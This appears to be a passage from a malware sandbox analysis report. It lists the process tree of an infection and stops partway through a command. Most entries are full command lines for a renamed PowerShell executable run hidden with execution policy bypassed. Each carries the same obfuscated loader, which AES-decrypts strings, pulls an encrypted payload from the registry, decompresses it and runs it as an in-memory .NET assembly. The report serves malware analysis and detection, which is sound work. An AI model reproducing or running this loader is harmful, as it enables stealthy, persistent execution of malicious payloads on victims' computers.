        "C:\Windows\$sxr-powershell.exe" -NoLogo -NoProfile -Noninteractive -WindowStyle hidden -ExecutionPolicy bypass -Command [System.Diagnostics.Process]::GetProcessById(4944).WaitForExit();[System.Threading.Thread]::Sleep(5000); $IUziZ1 = New-Object System.Security.Cryptography.AesManaged;$IUziZ1.Mode = [System.Security.Cryptography.CipherMode]::CBC;$IUziZ1.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$IUziZ1.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('czejaGDzXhtRk3rRQOwA7CFoM90g5FQgnJ85LaUZQd4=');$IUziZ1.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('MrEUmw2CRfIwDN4DnujVag==');$zJtjN = $IUziZ1.('rotpyrceDetaerC'[-1..-15] -join '')();$DEDSw = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('dNZQ79CdCcT3RZeJIBMeWA==');$DEDSw = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw, 0, $DEDSw.Length);$DEDSw = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw);$jMYEl = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('ffs1oB2cg9MQou+VEQ8aDXxHbAIu//njEEr4yqOAe8c=');$jMYEl = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($jMYEl, 0, $jMYEl.Length);$jMYEl = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($jMYEl);$XVbaw = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('GvpxgK9ah8YOSS3JRrNuog==');$XVbaw = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($XVbaw, 0, $XVbaw.Length);$XVbaw = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($XVbaw);$BYhfv = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('6lRW0jGzlAA5nbkjHf5Tsi2VcY+e72Di8pyST+P3b+zKhEOatzOvsZwWc+tNvaenFYt371ubGqjG2iZNgW2Ruqyxtm0FlLj/6SFCvhVuHBoXGShbkjll0X0J0Yf8IrHI015qKEspAwvJ3BIkY31lE641I57ZA9mkxn3r2dmP9uXIIejGAbUYS/Egydi59SI4nLAn0KYi1PmCbY3T/4H6s6RDYRGM84TonfBl6Shh4V7e77iWS5OK+T93c6MxOusyAlznel1QyGuYsaEpfjJ3pZxnRDqxM+cJ6BV7z8XM6VlKLAriZV3af8+QPmGxYUFSetnhCdNepWVjla/rc+wznH76gqNjdrTdE4sXG2oefxeMo2RVY9GEE56HPY/MHqKXuj9QJ9R71SzOk/Jp6SI/aU6ftBcuLTHGK8ii/LzWWM4=');$BYhfv = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($BYhfv, 0, $BYhfv.Length);$BYhfv = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($BYhfv);$Rqbjy = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('zLOMq/59oqNcdFMRuju6ng==');$Rqbjy = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($Rqbjy, 0, $Rqbjy.Length);$Rqbjy = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($Rqbjy);$KASyv = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('72lxeVY82PoJcJ3hbiQEIw==');$KASyv = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($KASyv, 0, $KASyv.Length);$KASyv = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($KASyv);$mknYJ = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('zVB7M6DhuDz9HVN22epYIw==');$mknYJ = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($mknYJ, 0, $mknYJ.Length);$mknYJ = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($mknYJ);$CcpOW = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('HUIziUB7x4wdL9DXkS0rtA==');$CcpOW = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($CcpOW, 0, $CcpOW.Length);$CcpOW = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($CcpOW);$IVrwI = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('sTbvcUvEJoAxsnBrBeUD8g==');$IVrwI = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($IVrwI, 0, $IVrwI.Length);$IVrwI = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($IVrwI);$DEDSw0 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('Jlr5GUhwRFzfhvwaclrGQg==');$DEDSw0 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw0, 0, $DEDSw0.Length);$DEDSw0 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw0);$DEDSw1 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('VRv4nf1Tsuy8xOh1GOIbLw==');$DEDSw1 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw1, 0, $DEDSw1.Length);$DEDSw1 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw1);$DEDSw2 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('qoyKUlYeEofaQd2Nsn4c1Q==');$DEDSw2 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw2, 0, $DEDSw2.Length);$DEDSw2 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw2);$DEDSw3 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('x+L5SCITRwLaIySJMRKPcA==');$DEDSw3 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw3, 0, $DEDSw3.Length);$DEDSw3 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw3);$zJtjN.Dispose();$IUziZ1.Dispose();$ZnTbq = [Microsoft.Win32.Registry]::$CcpOW.$mknYJ($DEDSw).$KASyv($jMYEl);$hYcHq = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($ZnTbq);$IUziZ = New-Object System.Security.Cryptography.AesManaged;$IUziZ.Mode = [System.Security.Cryptography.CipherMode]::CBC;$IUziZ.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$IUziZ.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('czejaGDzXhtRk3rRQOwA7CFoM90g5FQgnJ85LaUZQd4=');$IUziZ.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('MrEUmw2CRfIwDN4DnujVag==');$VYFAv = $IUziZ.('rotpyrceDetaerC'[-1..-15] -join '')();$hYcHq = $VYFAv.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($hYcHq, 0, $hYcHq.Length);$VYFAv.Dispose();$IUziZ.Dispose();$zInKm = New-Object System.IO.MemoryStream(, $hYcHq);$vncyw = New-Object System.IO.MemoryStream;$aIVco = New-Object System.IO.Compression.GZipStream($zInKm, [IO.Compression.CompressionMode]::$DEDSw1);$aIVco.$IVrwI($vncyw);$aIVco.Dispose();$zInKm.Dispose();$vncyw.Dispose();$hYcHq = $vncyw.ToArray();$zxNyE = $BYhfv | IEX;$OwixV = $zxNyE::$DEDSw2($hYcHq);$vhBKp = $OwixV.EntryPoint;$vhBKp.$DEDSw0($null, (, [string[]] ($XVbaw)))
        18⤵
        
        PID:3548
        
        C:\Windows\$sxr-powershell.exe
        
        "C:\Windows\$sxr-powershell.exe" -NoLogo -NoProfile -Noninteractive -WindowStyle hidden -ExecutionPolicy bypass -Command [System.Diagnostics.Process]::GetProcessById(4944).WaitForExit();[System.Threading.Thread]::Sleep(5000); $IUziZ1 = New-Object System.Security.Cryptography.AesManaged;$IUziZ1.Mode = [System.Security.Cryptography.CipherMode]::CBC;$IUziZ1.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$IUziZ1.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('czejaGDzXhtRk3rRQOwA7CFoM90g5FQgnJ85LaUZQd4=');$IUziZ1.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('MrEUmw2CRfIwDN4DnujVag==');$zJtjN = $IUziZ1.('rotpyrceDetaerC'[-1..-15] -join '')();$DEDSw = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('dNZQ79CdCcT3RZeJIBMeWA==');$DEDSw = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw, 0, $DEDSw.Length);$DEDSw = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw);$jMYEl = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('ffs1oB2cg9MQou+VEQ8aDXxHbAIu//njEEr4yqOAe8c=');$jMYEl = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($jMYEl, 0, $jMYEl.Length);$jMYEl = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($jMYEl);$XVbaw = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('GvpxgK9ah8YOSS3JRrNuog==');$XVbaw = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($XVbaw, 0, $XVbaw.Length);$XVbaw = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($XVbaw);$BYhfv = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('6lRW0jGzlAA5nbkjHf5Tsi2VcY+e72Di8pyST+P3b+zKhEOatzOvsZwWc+tNvaenFYt371ubGqjG2iZNgW2Ruqyxtm0FlLj/6SFCvhVuHBoXGShbkjll0X0J0Yf8IrHI015qKEspAwvJ3BIkY31lE641I57ZA9mkxn3r2dmP9uXIIejGAbUYS/Egydi59SI4nLAn0KYi1PmCbY3T/4H6s6RDYRGM84TonfBl6Shh4V7e77iWS5OK+T93c6MxOusyAlznel1QyGuYsaEpfjJ3pZxnRDqxM+cJ6BV7z8XM6VlKLAriZV3af8+QPmGxYUFSetnhCdNepWVjla/rc+wznH76gqNjdrTdE4sXG2oefxeMo2RVY9GEE56HPY/MHqKXuj9QJ9R71SzOk/Jp6SI/aU6ftBcuLTHGK8ii/LzWWM4=');$BYhfv = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($BYhfv, 0, $BYhfv.Length);$BYhfv = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($BYhfv);$Rqbjy = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('zLOMq/59oqNcdFMRuju6ng==');$Rqbjy = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($Rqbjy, 0, $Rqbjy.Length);$Rqbjy = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($Rqbjy);$KASyv = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('72lxeVY82PoJcJ3hbiQEIw==');$KASyv = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($KASyv, 0, $KASyv.Length);$KASyv = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($KASyv);$mknYJ = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('zVB7M6DhuDz9HVN22epYIw==');$mknYJ = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($mknYJ, 0, $mknYJ.Length);$mknYJ = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($mknYJ);$CcpOW = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('HUIziUB7x4wdL9DXkS0rtA==');$CcpOW = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($CcpOW, 0, $CcpOW.Length);$CcpOW = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($CcpOW);$IVrwI = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('sTbvcUvEJoAxsnBrBeUD8g==');$IVrwI = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($IVrwI, 0, $IVrwI.Length);$IVrwI = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($IVrwI);$DEDSw0 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('Jlr5GUhwRFzfhvwaclrGQg==');$DEDSw0 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw0, 0, $DEDSw0.Length);$DEDSw0 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw0);$DEDSw1 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('VRv4nf1Tsuy8xOh1GOIbLw==');$DEDSw1 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw1, 0, $DEDSw1.Length);$DEDSw1 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw1);$DEDSw2 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('qoyKUlYeEofaQd2Nsn4c1Q==');$DEDSw2 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw2, 0, $DEDSw2.Length);$DEDSw2 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw2);$DEDSw3 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('x+L5SCITRwLaIySJMRKPcA==');$DEDSw3 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw3, 0, $DEDSw3.Length);$DEDSw3 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw3);$zJtjN.Dispose();$IUziZ1.Dispose();$ZnTbq = [Microsoft.Win32.Registry]::$CcpOW.$mknYJ($DEDSw).$KASyv($jMYEl);$hYcHq = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($ZnTbq);$IUziZ = New-Object System.Security.Cryptography.AesManaged;$IUziZ.Mode = [System.Security.Cryptography.CipherMode]::CBC;$IUziZ.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$IUziZ.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('czejaGDzXhtRk3rRQOwA7CFoM90g5FQgnJ85LaUZQd4=');$IUziZ.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('MrEUmw2CRfIwDN4DnujVag==');$VYFAv = $IUziZ.('rotpyrceDetaerC'[-1..-15] -join '')();$hYcHq = $VYFAv.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($hYcHq, 0, $hYcHq.Length);$VYFAv.Dispose();$IUziZ.Dispose();$zInKm = New-Object System.IO.MemoryStream(, $hYcHq);$vncyw = New-Object System.IO.MemoryStream;$aIVco = New-Object System.IO.Compression.GZipStream($zInKm, [IO.Compression.CompressionMode]::$DEDSw1);$aIVco.$IVrwI($vncyw);$aIVco.Dispose();$zInKm.Dispose();$vncyw.Dispose();$hYcHq = $vncyw.ToArray();$zxNyE = $BYhfv | IEX;$OwixV = $zxNyE::$DEDSw2($hYcHq);$vhBKp = $OwixV.EntryPoint;$vhBKp.$DEDSw0($null, (, [string[]] ($XVbaw)))
        18⤵
        
        PID:5740
        
        C:\Windows\system32\wermgr.exe
        
        "C:\Windows\system32\wermgr.exe" "-outproc" "0" "4944" "3040" "2968" "3044" "0" "0" "3048" "0" "0" "0" "0" "0"
        18⤵
        Checks processor information in registry
        Enumerates system info in registry
        
        PID:5112
        
        C:\Windows\$sxr-powershell.exe
        
        "C:\Windows\$sxr-powershell.exe" -NoLogo -NoProfile -Noninteractive -WindowStyle hidden -ExecutionPolicy bypass -Command [System.Diagnostics.Process]::GetProcessById(6028).WaitForExit();[System.Threading.Thread]::Sleep(5000); $IUziZ1 = New-Object System.Security.Cryptography.AesManaged;$IUziZ1.Mode = [System.Security.Cryptography.CipherMode]::CBC;$IUziZ1.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$IUziZ1.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('czejaGDzXhtRk3rRQOwA7CFoM90g5FQgnJ85LaUZQd4=');$IUziZ1.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('MrEUmw2CRfIwDN4DnujVag==');$zJtjN = $IUziZ1.('rotpyrceDetaerC'[-1..-15] -join '')();$DEDSw = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('dNZQ79CdCcT3RZeJIBMeWA==');$DEDSw = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw, 0, $DEDSw.Length);$DEDSw = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw);$jMYEl = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('ffs1oB2cg9MQou+VEQ8aDXxHbAIu//njEEr4yqOAe8c=');$jMYEl = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($jMYEl, 0, $jMYEl.Length);$jMYEl = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($jMYEl);$XVbaw = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('GvpxgK9ah8YOSS3JRrNuog==');$XVbaw = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($XVbaw, 0, $XVbaw.Length);$XVbaw = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($XVbaw);$BYhfv = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('6lRW0jGzlAA5nbkjHf5Tsi2VcY+e72Di8pyST+P3b+zKhEOatzOvsZwWc+tNvaenFYt371ubGqjG2iZNgW2Ruqyxtm0FlLj/6SFCvhVuHBoXGShbkjll0X0J0Yf8IrHI015qKEspAwvJ3BIkY31lE641I57ZA9mkxn3r2dmP9uXIIejGAbUYS/Egydi59SI4nLAn0KYi1PmCbY3T/4H6s6RDYRGM84TonfBl6Shh4V7e77iWS5OK+T93c6MxOusyAlznel1QyGuYsaEpfjJ3pZxnRDqxM+cJ6BV7z8XM6VlKLAriZV3af8+QPmGxYUFSetnhCdNepWVjla/rc+wznH76gqNjdrTdE4sXG2oefxeMo2RVY9GEE56HPY/MHqKXuj9QJ9R71SzOk/Jp6SI/aU6ftBcuLTHGK8ii/LzWWM4=');$BYhfv = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($BYhfv, 0, $BYhfv.Length);$BYhfv = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($BYhfv);$Rqbjy = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('zLOMq/59oqNcdFMRuju6ng==');$Rqbjy = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($Rqbjy, 0, $Rqbjy.Length);$Rqbjy = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($Rqbjy);$KASyv = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('72lxeVY82PoJcJ3hbiQEIw==');$KASyv = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($KASyv, 0, $KASyv.Length);$KASyv = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($KASyv);$mknYJ = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('zVB7M6DhuDz9HVN22epYIw==');$mknYJ = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($mknYJ, 0, $mknYJ.Length);$mknYJ = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($mknYJ);$CcpOW = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('HUIziUB7x4wdL9DXkS0rtA==');$CcpOW = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($CcpOW, 0, $CcpOW.Length);$CcpOW = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($CcpOW);$IVrwI = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('sTbvcUvEJoAxsnBrBeUD8g==');$IVrwI = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($IVrwI, 0, $IVrwI.Length);$IVrwI = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($IVrwI);$DEDSw0 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('Jlr5GUhwRFzfhvwaclrGQg==');$DEDSw0 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw0, 0, $DEDSw0.Length);$DEDSw0 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw0);$DEDSw1 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('VRv4nf1Tsuy8xOh1GOIbLw==');$DEDSw1 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw1, 0, $DEDSw1.Length);$DEDSw1 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw1);$DEDSw2 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('qoyKUlYeEofaQd2Nsn4c1Q==');$DEDSw2 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw2, 0, $DEDSw2.Length);$DEDSw2 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw2);$DEDSw3 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('x+L5SCITRwLaIySJMRKPcA==');$DEDSw3 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw3, 0, $DEDSw3.Length);$DEDSw3 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw3);$zJtjN.Dispose();$IUziZ1.Dispose();$ZnTbq = [Microsoft.Win32.Registry]::$CcpOW.$mknYJ($DEDSw).$KASyv($jMYEl);$hYcHq = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($ZnTbq);$IUziZ = New-Object System.Security.Cryptography.AesManaged;$IUziZ.Mode = [System.Security.Cryptography.CipherMode]::CBC;$IUziZ.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$IUziZ.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('czejaGDzXhtRk3rRQOwA7CFoM90g5FQgnJ85LaUZQd4=');$IUziZ.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('MrEUmw2CRfIwDN4DnujVag==');$VYFAv = $IUziZ.('rotpyrceDetaerC'[-1..-15] -join '')();$hYcHq = $VYFAv.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($hYcHq, 0, $hYcHq.Length);$VYFAv.Dispose();$IUziZ.Dispose();$zInKm = New-Object System.IO.MemoryStream(, $hYcHq);$vncyw = New-Object System.IO.MemoryStream;$aIVco = New-Object System.IO.Compression.GZipStream($zInKm, [IO.Compression.CompressionMode]::$DEDSw1);$aIVco.$IVrwI($vncyw);$aIVco.Dispose();$zInKm.Dispose();$vncyw.Dispose();$hYcHq = $vncyw.ToArray();$zxNyE = $BYhfv | IEX;$OwixV = $zxNyE::$DEDSw2($hYcHq);$vhBKp = $OwixV.EntryPoint;$vhBKp.$DEDSw0($null, (, [string[]] ($XVbaw)))
        17⤵
        
        PID:6096
        
        C:\Windows\system32\wermgr.exe
        
        "C:\Windows\system32\wermgr.exe" "-outproc" "0" "6028" "3040" "2968" "3044" "0" "0" "3048" "0" "0" "0" "0" "0"
        17⤵
        Checks processor information in registry
        Enumerates system info in registry
        
        PID:5596
        
        C:\Windows\$sxr-powershell.exe
        
        "C:\Windows\$sxr-powershell.exe" -NoLogo -NoProfile -Noninteractive -WindowStyle hidden -ExecutionPolicy bypass -Command [System.Diagnostics.Process]::GetProcessById(7068).WaitForExit();[System.Threading.Thread]::Sleep(5000); $IUziZ1 = New-Object System.Security.Cryptography.AesManaged;$IUziZ1.Mode = [System.Security.Cryptography.CipherMode]::CBC;$IUziZ1.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$IUziZ1.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('czejaGDzXhtRk3rRQOwA7CFoM90g5FQgnJ85LaUZQd4=');$IUziZ1.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('MrEUmw2CRfIwDN4DnujVag==');$zJtjN = $IUziZ1.('rotpyrceDetaerC'[-1..-15] -join '')();$DEDSw = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('dNZQ79CdCcT3RZeJIBMeWA==');$DEDSw = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw, 0, $DEDSw.Length);$DEDSw = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw);$jMYEl = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('ffs1oB2cg9MQou+VEQ8aDXxHbAIu//njEEr4yqOAe8c=');$jMYEl = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($jMYEl, 0, $jMYEl.Length);$jMYEl = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($jMYEl);$XVbaw = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('GvpxgK9ah8YOSS3JRrNuog==');$XVbaw = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($XVbaw, 0, $XVbaw.Length);$XVbaw = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($XVbaw);$BYhfv = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('6lRW0jGzlAA5nbkjHf5Tsi2VcY+e72Di8pyST+P3b+zKhEOatzOvsZwWc+tNvaenFYt371ubGqjG2iZNgW2Ruqyxtm0FlLj/6SFCvhVuHBoXGShbkjll0X0J0Yf8IrHI015qKEspAwvJ3BIkY31lE641I57ZA9mkxn3r2dmP9uXIIejGAbUYS/Egydi59SI4nLAn0KYi1PmCbY3T/4H6s6RDYRGM84TonfBl6Shh4V7e77iWS5OK+T93c6MxOusyAlznel1QyGuYsaEpfjJ3pZxnRDqxM+cJ6BV7z8XM6VlKLAriZV3af8+QPmGxYUFSetnhCdNepWVjla/rc+wznH76gqNjdrTdE4sXG2oefxeMo2RVY9GEE56HPY/MHqKXuj9QJ9R71SzOk/Jp6SI/aU6ftBcuLTHGK8ii/LzWWM4=');$BYhfv = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($BYhfv, 0, $BYhfv.Length);$BYhfv = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($BYhfv);$Rqbjy = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('zLOMq/59oqNcdFMRuju6ng==');$Rqbjy = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($Rqbjy, 0, $Rqbjy.Length);$Rqbjy = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($Rqbjy);$KASyv = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('72lxeVY82PoJcJ3hbiQEIw==');$KASyv = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($KASyv, 0, $KASyv.Length);$KASyv = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($KASyv);$mknYJ = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('zVB7M6DhuDz9HVN22epYIw==');$mknYJ = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($mknYJ, 0, $mknYJ.Length);$mknYJ = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($mknYJ);$CcpOW = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('HUIziUB7x4wdL9DXkS0rtA==');$CcpOW = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($CcpOW, 0, $CcpOW.Length);$CcpOW = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($CcpOW);$IVrwI = 